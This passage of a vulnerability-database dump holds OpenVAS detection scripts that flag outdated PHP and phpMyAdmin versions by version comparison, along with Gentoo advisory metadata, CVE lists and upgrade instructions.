\"CVE-2010-3063\",\n \"CVE-2010-3064\", \"CVE-2010-3065\");\n script_bugtraq_id(38708, 40461, 40948, 41991);\n script_name(\"PHP Version < 5.3.3 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 
2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.3.3 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.3.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.3.3\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-01.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-7252", "CVE-2010-3055", "CVE-2011-0987", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2010-3056", "CVE-2010-2958", "CVE-2011-4634", "CVE-2011-2718", "CVE-2011-4107", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-4782", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-2507", "CVE-2008-7251", "CVE-2011-4780", "CVE-2011-0986", "CVE-2010-3263", "CVE-2011-4064"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070802", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070802", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201201_01.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based 
advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70802\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:41 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-01 
(phpMyAdmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in phpMyAdmin, the most severe\n of which allows the execution of arbitrary PHP code.\");\n script_tag(name:\"solution\", value:\"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-01\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=302745\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=335490\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=336462\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354227\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373951\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=376369\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=387413\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389427\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=395715\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\");\n script_xref(name:\"URL\", 
value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201201-01.\");\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 3.4.9\"), vulnerable: make_list(\"lt 3.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:15", "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-01.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-7252", "CVE-2010-3055", "CVE-2011-0987", "CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2010-3056", "CVE-2010-2958", "CVE-2011-4634", "CVE-2011-2718", "CVE-2011-4107", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-4782", "CVE-2011-2719", "CVE-2011-3646", "CVE-2011-2507", "CVE-2008-7251", "CVE-2011-4780", "CVE-2011-0986", "CVE-2010-3263", "CVE-2011-4064"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70802", "href": "http://plugins.openvas.org/nasl.php?oid=70802", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in phpMyAdmin, the most severe\n of which allows the execution of arbitrary PHP code.\";\ntag_solution = \"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\n 
\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-01\nhttp://bugs.gentoo.org/show_bug.cgi?id=302745\nhttp://bugs.gentoo.org/show_bug.cgi?id=335490\nhttp://bugs.gentoo.org/show_bug.cgi?id=336462\nhttp://bugs.gentoo.org/show_bug.cgi?id=354227\nhttp://bugs.gentoo.org/show_bug.cgi?id=373951\nhttp://bugs.gentoo.org/show_bug.cgi?id=376369\nhttp://bugs.gentoo.org/show_bug.cgi?id=387413\nhttp://bugs.gentoo.org/show_bug.cgi?id=389427\nhttp://bugs.gentoo.org/show_bug.cgi?id=395715\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201201-01.\";\n\n \n 
\nif(description)\n{\n script_id(70802);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:41 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 3.4.9\"), vulnerable: make_list(\"lt 3.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:00", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-06.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-06 (php)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", 
"CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070769", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070769", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_06.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70769\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 
(Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-06 (php)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in PHP, the worst of which\n leading to remote execution of arbitrary code.\");\n script_tag(name:\"solution\", value:\"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-06\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=306939\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=332039\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=340807\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=350908\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=355399\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=358791\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=358975\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=369071\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=372745\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373965\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=380261\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-06.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"ge 5.3.8\"), vulnerable: make_list(\"lt 5.3.8\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:51:09", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-06.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-06 (php)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70769", "href": "http://plugins.openvas.org/nasl.php?oid=70769", "sourceData": "#\n# OpenVAS 
Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were found in PHP, the worst of which\n leading to remote execution of arbitrary code.\";\ntag_solution = \"All PHP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.3.8'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=306939\nhttp://bugs.gentoo.org/show_bug.cgi?id=332039\nhttp://bugs.gentoo.org/show_bug.cgi?id=340807\nhttp://bugs.gentoo.org/show_bug.cgi?id=350908\nhttp://bugs.gentoo.org/show_bug.cgi?id=355399\nhttp://bugs.gentoo.org/show_bug.cgi?id=358791\nhttp://bugs.gentoo.org/show_bug.cgi?id=358975\nhttp://bugs.gentoo.org/show_bug.cgi?id=369071\nhttp://bugs.gentoo.org/show_bug.cgi?id=372745\nhttp://bugs.gentoo.org/show_bug.cgi?id=373965\nhttp://bugs.gentoo.org/show_bug.cgi?id=380261\";\ntag_summary = \"The 
remote host is missing updates announced in\nadvisory GLSA 201110-06.\";\n\n \n \nif(description)\n{\n script_id(70769);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2009-5016\", \"CVE-2010-1128\", \"CVE-2010-1129\", \"CVE-2010-1130\", \"CVE-2010-1860\", \"CVE-2010-1861\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1868\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\", \"CVE-2010-3436\", \"CVE-2010-3709\", \"CVE-2010-3710\", \"CVE-2010-3870\", \"CVE-2010-4150\", \"CVE-2010-4409\", \"CVE-2010-4645\", \"CVE-2010-4697\", \"CVE-2010-4698\", \"CVE-2010-4699\", \"CVE-2010-4700\", \"CVE-2011-0420\", \"CVE-2011-0421\", \"CVE-2011-0708\", \"CVE-2011-0752\", \"CVE-2011-0753\", \"CVE-2011-0755\", \"CVE-2011-1092\", \"CVE-2011-1148\", \"CVE-2011-1153\", \"CVE-2011-1464\", \"CVE-2011-1466\", \"CVE-2011-1467\", \"CVE-2011-1468\", \"CVE-2011-1469\", \"CVE-2011-1470\", \"CVE-2011-1471\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3189\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-06 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
